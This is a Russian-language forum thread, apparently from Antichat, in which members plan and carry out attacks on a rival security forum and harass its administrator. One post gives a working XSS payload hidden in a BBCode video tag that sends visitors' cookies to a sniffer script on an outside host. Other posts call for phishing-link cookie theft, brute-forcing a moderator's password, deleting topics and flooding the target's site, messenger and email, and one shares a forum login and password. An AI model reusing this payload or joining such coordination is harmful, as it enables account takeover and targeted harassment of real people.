![]() |
могу.
|
Кто Alisa понятно, а ху из ху: Lenin и Lera
|
lera - эт я регился)))
|
Lera и Alisa уже удалены, вас что забанили?
Появился новичёк Sila - это ктог из вас? |
я)))))
|
Вы так интересно обсуждаете эту тему :))))... А ну ка присоединись и я к вам :). гы )))
|
Хмм... There appears to be an error with the .:SecurityTeam Forum:. database.
|
Цитата:
Всего лишь нужен пароль модера (желательно ~LamO~, или админа). Да и кстати не плохая проверка своих знаний - взломать форум " по безопасности" :D . |
Ленин, это Я. Ну она и меня забанила.....
Вообщем проверял и проверял и вото что. Надо этот код Код HTML:
[color=#F8F8F8][video]http://1.ru e=`[/video]` style=display:none;background:url(javascript:document.images[12].src="http://antichat.ru/cgi-bin/s.jpg?WJ:"+document.cookie) [i]L[/i]ol[/color] |
Гы гы вообщем клёва у меня с ней война шла. Я довёл её до того что она вот что написала.
Цитата:
Вот, Цитата:
Думаю даже хакать уже её не надо......всё проучили вроде гы гы.... :D |
А нет! Оказывается не проучили та!
Цитата:
Кстате ктонебудь её хэш достал до того пока она фильтры на слово джва поставила? И там теперь даже регится не надо просто можно тут писать как Гость и усё нормально. :cool: http://www.security-teams.net/index....=10&#entry2227 |
НЕ я неотстану =)
Завтра добью если за меня никто несделает ето вперёд как всегда! :)))) |
Да усё ясно. Она постоянно отключает форум для починки. Так же кажется даже урл меняет так как я теперь опять как вчера зайти не могу. В принципи если это происходит, то и это можно назвать хаком. :cool:
|
Да, она урл поминяла. :cool:
Вот новый. http://www.security-teams.net/index.php?act=idx Убижать захотела. :cool: И ещё. Почему то Я только к ней теперь в браузере фаерфокс зайти не могу. У всех также? Ну и ещё одна новинька. Цитата:
|
Я тоже присаединяюс к вам :))
|
Мой ник на сайте у неё работает:
Народ если кому влом заного регится, или кого из вас забанили на время :D , то заходите под моим профилем: Ник: Питерский Пароль: 125924. ЗЫ: А слово сочетание: "Пшли щенки нах отсюда, ничего у вас не получится", эт её любимое :D |
А вообще Я уже сразу усёк что у неё фаерфокс. Врядли получится у неё стыреть куки кроме как послать и заманить её на ссылку.....
|
есть идея одна =) White Jordan я тебе в приват напишу позже...
|
ну и мне... :)
|
блин слишком много шума. ацтой.
inot - модератор. Постораюсь его добить. И если фильтр на яву то надо придумать чтонить. Сча думалку подключууууууууу............. И вообще... можно ещё по мыльникам пройтись! Так что.... способы неисчерпаны! :D nmancer - Вот ещё модер |
Цитата:
|
Короче нашол Я ещё одну уязвимость у неё на форуме. Теоретически должно сработать даже если у неё фаерфокс. Вообщем Утил хочишь обьясню получишь Админа? :o
А вообще жалко что нашол, интересно когда что то не имеешь но хочишь, а получишь, перестанишь хотеть........ :( |
Ребята ну так чем кончится этот детектив?? :)
Блин пикольно так за вами наблюдать. Вы молодцы! |
Кто то проболтался из наших про античат и ей сказали так как теги видео и саунда она отключила вообще. Кто то ей видно сказал из её друзей или из наших или она сама античат нашла вообщем только при прочтении античатовской статьи она бы смогла узнать про тег саунда и поставить в теги саунда и видео фильтрацию так как Я саунда не использовал у неё вообще. Да и вообще она теперь во всех кажится тегах поставила фильтрацию в тегах.
И вообще, (Опять слово вообще =) ) мы слишком много шума развели и очень неокуратно себя там повели, себя неоднократно выдавая. Она ченила естественно. Хакать надо тихо и быстро. Неудивлюсь если она это читает, (привет=))) ). На античатовский сниффер она фильтр поставила и что означает, она спокойно могла приити на главную страницу и прочитать статью Алгола. :o Итог. Не шумите и не выдавайте себя когда хотите кого то хакнуть. :o А самое главное, надо быть окуратным. Ну конечно, естественно есть ещё ОЧЕНЬ много способов её хакнуть но это уже дело социальной инженерии, =) А Я на это дело забил. Мне как то лень стало............lol Вообщем шлите ей ссылку, воруйте у неё куки таким образом и это единственный ваш шанс что то ей зделать. И конечно мне до неё теперь до лампочки. :o Мне просто в начале было интересно, но потом когда многие тут себя неокуратно на её форуме повели себя выдав, это убило во мне всё жилание идти дальше. Короче если бы Я один это делал, Я бы ДАВНЫМ давно там был Админом. У неё форум очень дырявый был. Хотя Я же тут сам код всем дал вот и получил кажется........не надобыло мне давать а самому делать. Второй итог. =) Хотите что то хакнуть, делайте это сами и не просите народ а ПРОСИТЕ МЕНЯ НАХ!!!!!! =) |
или меня :D
|
А правда Я необычный человек? Сам дал всем рабочий код. Сам позвал народ а потом всем говорю что Я должен был один действовать? Ну и ютила конечно взял он умный парень. А так Я да он должы были быть. =)
Вы все виноваты короче, а зато что вы на античате есть, то виноват античат. =) |
Привет всем!
Кому не впадло и есть время - поставьте на подбор пароль этого МУДЕратора ~:Lam0:~ Хотя бы затрем несколько тем, так, как это они сделали у нас на ПРО-двинутом! :э( ЗЫ: Либо какого-нить другого, т.к. этот лось точно себе впиндюрит пасс из всех возможных комбинаций, цифр, букв и символов! :э) |
Ну и откуда мы его хэш возьмём? Там ведь все дыры забили? Как ты куки теперь своруешь?
|
temon я думаю хоть народ немного и разочаровался, но комедия ещё не кончилась.
|
Давайте брутить по очереди)))
|
Прально, шумиху развели, вот она все и позакрывала. Однако - она не до конца знает откуда будет следующий удар =)
Вообщем - кто что нароет: а.передавайте инфу по личке только тем - в ком вы уверены что это не она б.тут не кричите |
Отвратительная женщина. Бр. бгуааа =(
|
Цитата:
Народ вы хоть посты выкладывайте, после общения с ней, поугораем. |
Народ только меня слушает. :rolleyes:
Команды тут Я даю всем ясно? :rolleyes: |
Кстате она уже сама себя взломала. Она у себя на форуме все теги отключила кроме маленьких. :rolleyes:
У неё форум считай взломан так как он уже не форум так как без тегов какой это форум? :rolleyes: |
2 expertlamer
Цитата:
|
Вот и я присоединяюсь!!!
Я так думаю что счас не что не получится потому что на данный момент форум можно сказать закрыт!!!! (из за нас :d ) Надо повторить атаку , гдето через неделику!!! Только сообща и сразу всем вмести ,а обмениваться данными на какомнибуть никому не известном чате!!!Предворительно договорившесь о времени и месте чата в привате!!! И бомбить сразу по всему(сайт,аська,мыло,ip) и вообще не давать ей либо куда влесть когда будет происходить взлом!!! |
Человеки, не молчим! Как результаты?
|
Ну она мне письмо тута прислала как начинающиму эту затею. =) Всётке Я это начил всё и вот как боссу она мне и прислала даже приятно как то....=)
Кто не вкурсе White Jordan это Я тоже. =) Вообщем уникательная женщина! Умная и на такой бы на свидание пошол эт точно! =) |
Цитата:
|
| Время: 09:52 |